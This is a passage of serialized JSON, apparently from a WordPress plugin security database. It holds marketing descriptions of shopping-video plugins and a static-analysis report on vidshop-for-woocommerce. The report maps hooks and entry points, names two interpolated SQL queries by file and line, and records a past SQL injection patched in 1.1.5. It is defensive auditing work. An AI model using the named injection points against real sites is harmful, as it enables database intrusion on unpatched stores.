allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation 
allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>Support\u003C\u002Fh3>\n\u003Cp>For technical support, documentation, and feature requests, please visit our \u003Ca href=\"https:\u002F\u002Fimmerss.live\u002Fsupport\" rel=\"nofollow ugc\">support center\u003C\u002Fa> or contact us directly through your admin dashboard.\u003C\u002Fp>\n\u003Cp>Transform your online store today with immersive shopping experiences that convert browsers into buyers!\u003C\u002Fp>\n","Turn browsers into buyers with idiot-proof technology.",301,"2025-12-12T19:09:00.000Z","4.7",[108,90,21,109,23],"interactive-video","shopping-assistant","https:\u002F\u002Fimmerss.live","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fimmersive-shopping-and-videos.1.16.zip",{"slug":113,"name":114,"version":115,"author":116,"author_profile":117,"description":118,"short_description":119,"active_installs":29,"downloaded":120,"rating":29,"num_ratings":29,"last_updated":121,"tested_up_to":85,"requires_at_least":106,"requires_php":122,"tags":123,"homepage":128,"download_link":129,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"digitalsignage4","Product Video Generator","1.0.13","Acacia Dynamic","https:\u002F\u002Fprofiles.wordpress.org\u002Facaciadynamic\u002F","\u003Cp>The first tool on the market capable of automatically creating videos from a product sheet,\u003Cbr \u002F>\nProduct Video Generator highlights your products, makes them more attractive and keeps web users on your site for longer.\u003Cbr \u002F>\n-> Boost your e-shop\u003Cbr \u002F>\n-> Increase your conversion rate\u003Cbr \u002F>\n-> Automatically broadcast your videos on YouTube\u003Cbr \u002F>\n-> Use them on your social networks: Instagram, Facebook, Tik Tok, etc.\u003C\u002Fp>\n\u003Ch3>Third-Party Services\u003C\u002Fh3>\n\u003Cp>This plugin uses the following third-party service(s):\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Product Video 
Generator\u003C\u002Fstrong>\n\u003Cul>\n\u003Cli>\u003Cstrong>Purpose\u003C\u002Fstrong>: The creation of videos of your products is done on our servers.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Data shared\u003C\u002Fstrong>: Product pictures, name, description, price, categories.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy policy\u003C\u002Fstrong>: https:\u002F\u002FProductVideo.io\u002Fen\u002Fprivacy-policy\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>By using this plugin, you agree to the terms and conditions of this third-party service.\u003C\u002Fp>\n","Product Video Generator allows you to create animated product sheets in the form of high-quality videos.",904,"2025-12-17T09:37:00.000Z","7.0",[124,125,21,126,127],"automation","increase","sales","youtube","https:\u002F\u002Fwww.productvideo.io\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdigitalsignage4.1.0.13.zip",{"slug":131,"name":132,"version":133,"author":134,"author_profile":135,"description":136,"short_description":137,"active_installs":29,"downloaded":138,"rating":29,"num_ratings":29,"last_updated":139,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":140,"homepage":144,"download_link":145,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"ieasysell-connector","Ieasysell — AI Virtual Shopping Assistant & Shoppable Video","1.0.1","ieasysell","https:\u002F\u002Fprofiles.wordpress.org\u002Fieasysell\u002F","\u003Cp>\u003Cstrong>Ieasysell\u003C\u002Fstrong> is the all-in-one \u003Cstrong>virtual shopping assistant\u003C\u002Fstrong>, \u003Cstrong>shoppable video\u003C\u002Fstrong>, and \u003Cstrong>live shopping\u003C\u002Fstrong> platform built for global WordPress & WooCommerce stores. 
Your AI sales rep speaks, listens, and sells in 50+ languages — around the clock, without extra headcount.\u003C\u002Fp>\n\u003Cp>Whether your customers speak English, Spanish, Arabic, Japanese, or any of 50+ supported languages, Ieasysell ensures your store never sleeps. Combine video commerce, live shopping events, and AI avatar interaction to convert more visitors — wherever they’re from.\u003C\u002Fp>\n\u003Ch4>Why Ieasysell?\u003C\u002Fh4>\n\u003Cp>Most voice AI tools support only 1–2 languages. Most shoppable video apps can’t talk. Most live shopping platforms don’t analyze intent. \u003Cstrong>Ieasysell does all three — in one plugin.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>No language barriers\u003C\u002Fstrong> — 50+ languages supported out of the box\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No app-stacking\u003C\u002Fstrong> — shoppable video + live shopping + voice AI, all in one\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No missed leads\u003C\u002Fstrong> — every conversation recorded and scored by AI\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No complex setup\u003C\u002Fstrong> — live in under 5 minutes with one plugin install\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Core Features\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>🎙️ AI Voice Shopping Assistant\u003C\u002Fstrong>\u003Cbr \u002F>\nReal-time 1-on-1 voice interaction in 30+ languages, available 24\u002F7. Your AI assistant answers product questions, makes recommendations, and guides customers to checkout — just like a human sales rep, but always available.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🎬 Shoppable Video\u003C\u002Fstrong>\u003Cbr \u002F>\nShowcase your products with close-up video experiences. Customers can watch and buy without ever leaving the video — reducing drop-off and increasing conversion rates.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📡 Live Shopping\u003C\u002Fstrong>\u003Cbr \u002F>\nHost live product demos directly on your WordPress site. 
Your AI presenter introduces products in real time with instant one-click purchase capability. Engage viewers and convert them while they watch.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📖 AI Product Catalog & Video Handbook\u003C\u002Fstrong>\u003Cbr \u002F>\nAttach close-up demo videos and digital product handbooks to any WooCommerce product listing. Let your products speak for themselves — literally.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🧬 Custom AI Persona\u003C\u002Fstrong>\u003Cbr \u002F>\nChoose from pre-built public AI models or fully customize your assistant’s face, voice, and personality to match your brand identity. Your AI, your brand.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>📊 Conversation Analytics & AI Intent Analysis\u003C\u002Fstrong>\u003Cbr \u002F>\nEvery conversation is stored and analyzed. Ieasysell’s AI intent scoring identifies high-value leads automatically — so your team follows up at exactly the right moment.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🔌 Easy WordPress Integration\u003C\u002Fstrong>\u003Cbr \u002F>\nInstall the plugin, paste your API key, and you’re live. Works seamlessly with WooCommerce. 
Also supports any website via a single line of JavaScript.\u003C\u002Fp>\n\u003Ch4>Perfect For\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>DTC (direct-to-consumer) brands selling to global markets\u003C\u002Fli>\n\u003Cli>Fashion, beauty, electronics, home goods — any visual product category\u003C\u002Fli>\n\u003Cli>WooCommerce store owners who want to cut support costs while increasing conversion\u003C\u002Fli>\n\u003Cli>Stores expanding from English-speaking markets into multilingual audiences\u003C\u002Fli>\n\u003Cli>Merchants who want to replace static product pages with interactive video experiences\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>How It Works\u003C\u002Fh4>\n\u003Col>\n\u003Cli>Install and activate the Ieasysell plugin\u003C\u002Fli>\n\u003Cli>Connect your Ieasysell account (free to start at \u003Ca href=\"https:\u002F\u002Fwww.ieasysell.com\" rel=\"nofollow ugc\">ieasysell.com\u003C\u002Fa>)\u003C\u002Fli>\n\u003Cli>Configure your AI assistant — choose persona, languages, and linked products\u003C\u002Fli>\n\u003Cli>Upload shoppable product videos and set up your first live shopping event\u003C\u002Fli>\n\u003Cli>Embed on any page or let it auto-appear site-wide — your AI sales rep is live\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch4>Supported Languages (30+)\u003C\u002Fh4>\n\u003Cp>English, Spanish, French, German, Portuguese, Italian, Dutch, Russian, Arabic, Japanese, Korean, Chinese (Simplified & Traditional), Hindi, Turkish, Polish, Swedish, Danish, Norwegian, Finnish, Greek, Czech, Romanian, Hungarian, Thai, Vietnamese, Indonesian, Malay, Hebrew, and more.\u003C\u002Fp>\n\u003Ch4>Integrations\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>WooCommerce\u003C\u002Fstrong> — native product sync, cart integration, and order tracking\u003C\u002Fli>\n\u003Cli>\u003Cstrong>WordPress\u003C\u002Fstrong> — works with any theme or page builder (Elementor, Divi, Gutenberg)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Any website\u003C\u002Fstrong> — paste one line of 
JavaScript to embed on non-WordPress pages\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Shopify\u003C\u002Fstrong> — also available on the Shopify App Store\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin relies on third-party external services to provide Digital Human embedding functionality.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Service Name: IEasySell Digital Human Service\u003C\u002Fli>\n\u003Cli>Service Provider: Ieasysell (www.ieasysell.com)\u003C\u002Fli>\n\u003Cli>Purpose: This service is used to load and render interactive digital human video components on the frontend of WordPress websites to enhance user engagement and sales conversion.\u003C\u002Fli>\n\u003Cli>Data Transmission Description:\n\u003Cul>\n\u003Cli>Content Sent: When pages containing digital human components are loaded, the plugin sends requests to \u003Ccode>app.ieasysell.com\u003C\u002Fcode> to load necessary JavaScript resources (\u003Ccode>digital-human-embed.js\u003C\u002Fcode>). Depending on the implementation of this service, user IP addresses, User-Agent strings, and the current page URL may be sent to properly render content and analyze usage. If user input occurs during digital human interactions, related data may also be transmitted to that server for processing.\u003C\u002Fli>\n\u003Cli>Timing: Data is only sent when visitors access pages containing the digital human component and their browsers execute the embedded script.\u003C\u002Fli>\n\u003Cli>Conditions: The connection will be established as long as the administrator has enabled the digital human feature in the plugin settings and placed it on a page.\u003Cbr \u002F>\n*Privacy Policy: https:\u002F\u002Fapp.ieasysell.com\u002Fprivate\u002FchinesePrivate.html\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: Using this feature indicates your agreement with the above third-party terms of service and privacy policy. 
It’s recommended to inform your website visitors before enabling this feature.\u003C\u002Fp>\n","Turn visitors into buyers with AI live shopping, shoppable videos & live selling — in 30+ languages, 24\u002F7.",329,"2026-04-02T11:16:00.000Z",[141,90,142,23,143],"ai-voice-assistant","shoppable-video","virtual-shopping-assistant","https:\u002F\u002Fapp.ieasysell.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fieasysell-connector.1.0.2.zip",{"slug":147,"name":148,"version":149,"author":150,"author_profile":151,"description":152,"short_description":153,"active_installs":29,"downloaded":154,"rating":29,"num_ratings":29,"last_updated":155,"tested_up_to":85,"requires_at_least":156,"requires_php":157,"tags":158,"homepage":164,"download_link":165,"security_score":13,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"live-sales-for-woocommerce","Live Sales for WooCommerce","1.0.0","interactivecomms","https:\u002F\u002Fprofiles.wordpress.org\u002Finteractivecomms\u002F","\u003Cp>Experience the future of interactive commerce with \u003Ccode>Live Sales for WooCommerce\u003C\u002Fcode> plugin. Accelerate your sales process with ultra-low latency, enabling you to close deals faster than ever. 
Leverage the power of live streaming to enhance your online sales strategy.\u003C\u002Fp>\n\u003Ch3>Third party libraries\u002Fservices used in this plugin\u003C\u002Fh3>\n\u003Col>\n\u003Cli>\n\u003Cp>Ant Media Server and their SDK to provide live streaming services.\u003Cbr \u002F>\nWebsite: https:\u002F\u002Fantmedia.io\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Font Awesome Free\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Version: 6.6.0\u003C\u002Fli>\n\u003Cli>License: Font Awesome Free License (MIT, OFL, and CC BY 4.0)\u003C\u002Fli>\n\u003Cli>License URL: https:\u002F\u002Ffontawesome.com\u002Flicense\u002Ffree\u003C\u002Fli>\n\u003Cli>Author: Fonticons, Inc.\u003C\u002Fli>\n\u003Cli>Website: https:\u002F\u002Ffontawesome.com\u002F\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Krajee jQuery DateTime Picker\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Version: 1.3.3\u003C\u002Fli>\n\u003Cli>Author: Kartik Visweswaran (Krajee.com)\u003C\u002Fli>\n\u003Cli>Source: https:\u002F\u002Fplugins.krajee.com\u003C\u002Fli>\n\u003Cli>License: BSD 3-Clause License\u003C\u002Fli>\n\u003Cli>License URL: https:\u002F\u002Fgithub.com\u002Fkartik-v\u002Fphp-date-formatter\u002Fblob\u002Fmaster\u002FLICENSE.md\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>webrtc-adapter\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Source: https:\u002F\u002Fcdn.jsdelivr.net\u002Fnpm\u002Fwebrtc-adapter@9.0.3\u002Fout\u002Fadapter.js\u003C\u002Fli>\n\u003Cli>Version: 9.0.3\u003C\u002Fli>\n\u003Cli>License: BSD-3-Clause\u003C\u002Fli>\n\u003Cli>Website: https:\u002F\u002Fwww.npmjs.com\u002Fpackage\u002Fwebrtc-adapter\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Select2\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Source: https:\u002F\u002Fcdn.jsdelivr.net\u002Fnpm\u002Fselect2@4.1.0-rc.0\u002Fdist\u002Fjs\u002Fselect2.min.js\u003C\u002Fli>\n\u003Cli>Version: 4.1.0-rc.0\u003C\u002Fli>\n\u003Cli>License: MIT\u003C\u002Fli>\n\u003Cli>Website: 
https:\u002F\u002Fselect2.org\u002F\u003C\u002Fli>\n\u003Cli>GitHub: https:\u002F\u002Fgithub.com\u002Fselect2\u002Fselect2\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Prerequisite\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>WooCommerce\u003C\u002Fli>\n\u003Cli>Ant Media Server application credentials.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Seamless Integration: Connects effortlessly with WooCommerce and AntMedia Server.\u003C\u002Fli>\n\u003Cli>Live Streaming: Go live and showcase your products in real-time.\u003C\u002Fli>\n\u003Cli>Interactive Chat: Engage with customers directly through integrated chat.\u003C\u002Fli>\n\u003Cli>Quick Setup: Configure settings and go live within 5 minutes!\u003C\u002Fli>\n\u003Cli>Boost Sales: Live demos with direct purchasing options to increase conversion rates.\u003C\u002Fli>\n\u003Cli>Logo & Marquee: Display your brand logo along with product details information in marquee during live selling.\u003C\u002Fli>\n\u003Cli>Live customers count : Get the viewer count info on your dashboard in real time.\u003C\u002Fli>\n\u003Cli>LIVESAFO Agent Role: Allow you to create multiple staff or agents role. With the flexibility to schedule unlimited live sales, the possibilities are endless.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Why You’ll Love It\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>This plugin is designed for ease of use and flexibility. Whether you’re running a small boutique or a large-scale online store, you’ll find it incredibly easy to set up and start broadcasting your products live. Imagine the possibilities of hosting live product launches, Q&A sessions, or exclusive sales events! Ready to Elevate Your Online Store? Let’s make online selling more dynamic and interactive than ever. Your customers will love the personal touch, and you’ll love the sales report! Happy live selling!\u003C\u002Fli>\n\u003C\u002Ful>\n","Experience future of interactive commerce. 
Enjoy ultra-low latency interactive live sales with chat feature for faster and effective live commerce.",234,"2025-08-22T12:19:00.000Z","6.8","7.3",[159,160,161,162,163],"ant-media-server","interactive-video-commerce","live-chat-for-woocommerce","woocommerce-live-sales","woocommerce-live-shopping","https:\u002F\u002Finteractivecomms.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flive-sales-for-woocommerce.1.0.0.zip",{"attackSurface":167,"codeSignals":239,"taintFlows":256,"riskAssessment":257,"analyzedAt":263},{"hooks":168,"ajaxHandlers":227,"restRoutes":232,"shortcodes":233,"cronEvents":238,"entryPointCount":68,"unprotectedCount":29},[169,175,180,185,187,190,195,199,203,207,213,217,220,225],{"type":170,"name":171,"callback":172,"file":173,"line":174},"action","admin_init","maybe_redirect_after_activation","includes\\admin\\class-activation-handler.php",30,{"type":170,"name":176,"callback":177,"file":178,"line":179},"admin_menu","add_admin_menu","includes\\admin\\class-admin-loader.php",52,{"type":170,"name":181,"callback":182,"priority":183,"file":178,"line":184},"admin_notices","remove_notices",999,55,{"type":170,"name":181,"callback":186,"file":178,"line":94},"inject_before_notices",{"type":170,"name":181,"callback":188,"file":178,"line":189},"inject_after_notices",57,{"type":191,"name":192,"callback":193,"file":178,"line":194},"filter","admin_footer_text","change_admin_footer_text",60,{"type":191,"name":196,"callback":197,"file":178,"line":198},"admin_body_class","closure",63,{"type":170,"name":200,"callback":201,"file":178,"line":202},"wp_enqueue_scripts","add_admin_bar_styles",75,{"type":170,"name":181,"callback":204,"file":205,"line":206},"show_review_notice","includes\\admin\\class-review-notice.php",27,{"type":170,"name":208,"callback":209,"priority":210,"file":211,"line":212},"plugins_loaded","maybe_install_tables",20,"includes\\database\\class-database-module.php",42,{"type":170,"name":214,"callback":214,"file":215,"line":216},"ini
t","includes\\frontend\\class-frontend-loader.php",33,{"type":170,"name":200,"callback":218,"file":215,"line":219},"register_frontend_scripts",36,{"type":170,"name":221,"callback":222,"file":223,"line":224},"rest_api_init","register_rest_routes","includes\\rest-api\\class-rest-api-module.php",73,{"type":170,"name":208,"callback":197,"file":55,"line":226},41,[228],{"action":229,"nopriv":57,"callback":230,"hasNonce":231,"hasCapCheck":57,"file":205,"line":174},"vsfw_dismiss_review_notice","ajax_dismiss_notice",true,[],[234],{"tag":235,"callback":236,"file":215,"line":237},"vsfw-videos","render_video_shortcode",44,[],{"dangerousFunctions":240,"sqlUsage":241,"outputEscaping":252,"fileOperations":29,"externalRequests":29,"nonceChecks":28,"capabilityChecks":28,"bundledLibraries":255},[],{"prepared":242,"raw":68,"locations":243},50,[244,248],{"file":245,"line":246,"context":247},"includes\\abstracts\\class-model.php",1065,"$wpdb->get_results() with variable interpolation",{"file":249,"line":250,"context":251},"includes\\abstracts\\class-table.php",58,"$wpdb->get_var() with variable interpolation",{"escaped":253,"rawEcho":29,"locations":254},22,[],[],[],{"summary":258,"deductions":259},"The vidshop-for-woocommerce plugin v1.1.5 exhibits a generally strong security posture based on the static analysis. The code demonstrates excellent practices with 100% output escaping and 96% of SQL queries utilizing prepared statements. The absence of dangerous functions, file operations, and external HTTP requests is also a positive sign. Furthermore, the limited attack surface, with only two entry points and no unprotected ones, further contributes to its secure design.\n\nHowever, the vulnerability history presents a significant concern. The presence of one known high-severity CVE, specifically an SQL Injection vulnerability, even though it is currently patched, suggests a past weakness that could be exploited if the plugin were not updated. 
SQL Injection stems from how user-supplied data reaches database queries, so the two queries the scan did not classify as prepared deserve specific attention: $wpdb->get_results() with variable interpolation in includes\u002Fabstracts\u002Fclass-model.php (line 1065) and $wpdb->get_var() with variable interpolation in includes\u002Fabstracts\u002Fclass-table.php (line 58). No taint flow from request input to either call was detected, but interpolation inside shared model\u002Ftable abstractions can be reached from many callers, so both should be manually reviewed (or wrapped in $wpdb->prepare()) rather than assumed safe. The single AJAX handler (vsfw_dismiss_review_notice) is nonce-protected and, per the scan, not registered for unauthenticated (nopriv) requests, but no capability check is recorded; its impact is limited to dismissing an admin notice.\n\nIn conclusion, vidshop-for-woocommerce v1.1.5 is well-implemented from a static analysis perspective, with strong adherence to secure coding practices. The primary weakness lies in its vulnerability history: the high-severity SQL injection affects every release from 1.0.0 through 1.1.4 and is patched only in 1.1.5, so any site still on an earlier version should update immediately. The absence of current critical or high-severity findings in the static analysis is encouraging, but given that history the two interpolated queries above, and any new query paths added in future releases, should be verified rather than presumed safe.",[260],{"reason":261,"points":262},"Past high severity SQL Injection vulnerability",15,"2026-03-16T19:45:34.574Z",{"wat":265,"direct":282},{"assetPaths":266,"generatorPatterns":275,"scriptPaths":276,"versionParams":277},[267,268,269,270,271,272,273,274],"\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Fadmin-style.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Fadmin-style.min.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.min.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.min.css","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.js","\u002Fwp-content\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.min.js",[],[269,273],[278,279,280,281],"vidshop-for-woocommerce\u002Fassets\u002Fcss
\u002Fadmin-style.css?ver=","vidshop-for-woocommerce\u002Fassets\u002Fjs\u002Fadmin-script.js?ver=","vidshop-for-woocommerce\u002Fassets\u002Fcss\u002Ffront-style.css?ver=","vidshop-for-woocommerce\u002Fassets\u002Fjs\u002Ffront-script.js?ver=",{"cssClasses":283,"htmlComments":286,"htmlAttributes":287,"restEndpoints":293,"jsGlobals":294,"shortcodeOutput":296},[284,285],"vsfw-admin","vsfw-page",[],[288,289,290,291,292],"data-vsfw-video-product","data-vsfw-video-id","data-vsfw-product-id","data-vsfw-product-url","data-vsfw-product-position",[],[295],"vsfw_params",[297],"[vidshop_video]",{"error":231,"url":299,"statusCode":300,"statusMessage":301,"message":301},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fvidshop-for-woocommerce\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":303,"versions":304},10,[305,310,318,326,334,342,350,358,366,373],{"version":6,"download_url":26,"svn_tag_url":306,"released_at":39,"has_diff":57,"diff_files_changed":307,"diff_lines":39,"trac_diff_url":308,"vulnerabilities":309,"is_current":231},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.4&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.5",[],{"version":311,"download_url":312,"svn_tag_url":313,"released_at":39,"has_diff":57,"diff_files_changed":314,"diff_lines":39,"trac_diff_url":315,"vulnerabilities":316,"is_current":57},"1.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.3&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.4",[317],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,
"patched_in_version":6},{"version":319,"download_url":320,"svn_tag_url":321,"released_at":39,"has_diff":57,"diff_files_changed":322,"diff_lines":39,"trac_diff_url":323,"vulnerabilities":324,"is_current":57},"1.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.2&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.3",[325],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":327,"download_url":328,"svn_tag_url":329,"released_at":39,"has_diff":57,"diff_files_changed":330,"diff_lines":39,"trac_diff_url":331,"vulnerabilities":332,"is_current":57},"1.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.1&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.2",[333],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":335,"download_url":336,"svn_tag_url":337,"released_at":39,"has_diff":57,"diff_files_changed":338,"diff_lines":39,"trac_diff_url":339,"vulnerabilities":340,"is_current":57},"1.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.0&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.1",[341],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched
_in_version":6},{"version":343,"download_url":344,"svn_tag_url":345,"released_at":39,"has_diff":57,"diff_files_changed":346,"diff_lines":39,"trac_diff_url":347,"vulnerabilities":348,"is_current":57},"1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.3&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.1.0",[349],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":351,"download_url":352,"svn_tag_url":353,"released_at":39,"has_diff":57,"diff_files_changed":354,"diff_lines":39,"trac_diff_url":355,"vulnerabilities":356,"is_current":57},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.2&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.3",[357],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":359,"download_url":360,"svn_tag_url":361,"released_at":39,"has_diff":57,"diff_files_changed":362,"diff_lines":39,"trac_diff_url":363,"vulnerabilities":364,"is_current":57},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.1&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.2",[365],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_vers
ion":6},{"version":133,"download_url":367,"svn_tag_url":368,"released_at":39,"has_diff":57,"diff_files_changed":369,"diff_lines":39,"trac_diff_url":370,"vulnerabilities":371,"is_current":57},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.0&new_path=%2Fvidshop-for-woocommerce%2Ftags%2F1.0.1",[372],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":149,"download_url":374,"svn_tag_url":375,"released_at":39,"has_diff":57,"diff_files_changed":376,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":377,"is_current":57},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvidshop-for-woocommerce.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fvidshop-for-woocommerce\u002Ftags\u002F1.0.0\u002F",[],[378],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6}]